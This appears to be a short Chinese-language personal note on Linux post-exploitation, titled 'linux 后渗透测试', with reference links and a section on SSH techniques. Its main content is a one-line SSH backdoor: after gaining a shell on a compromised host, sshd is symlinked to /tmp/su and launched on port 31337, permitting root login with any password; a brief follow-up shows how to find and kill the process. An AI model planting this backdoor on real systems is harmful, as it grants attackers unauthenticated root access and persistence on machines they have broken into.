[关闭]
@websec007 2017-07-26T20:46:14.000000Z 字数 518 阅读 1677

linux 后渗透测试

未分类


学习参考:
http://weibo.com/1869235073/B9Seswf9R?type=comment
http://weibo.com/p/1001603723521007220513
http://www.sohu.com/a/126011736_505860

linux 常用shell反弹方法小结:
https://edu.aqniu.com/group/3/thread/22

1. SSH渗透技巧

1.1 ssh 临时后门

入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行

  1. myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:

ssh_backdoor

1.2 如何杀死ssh临时后门

临时后门生成后,如果我们需要杀死这个进程,请使用以下语句。

  1. myles@localhost# ps -ef |grep 31337 #查询后门进程ID
  2. myles@localhost# kill -9 ssh_pid #使用kill -9 直接杀死进程

kill_ssh_backdoor

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注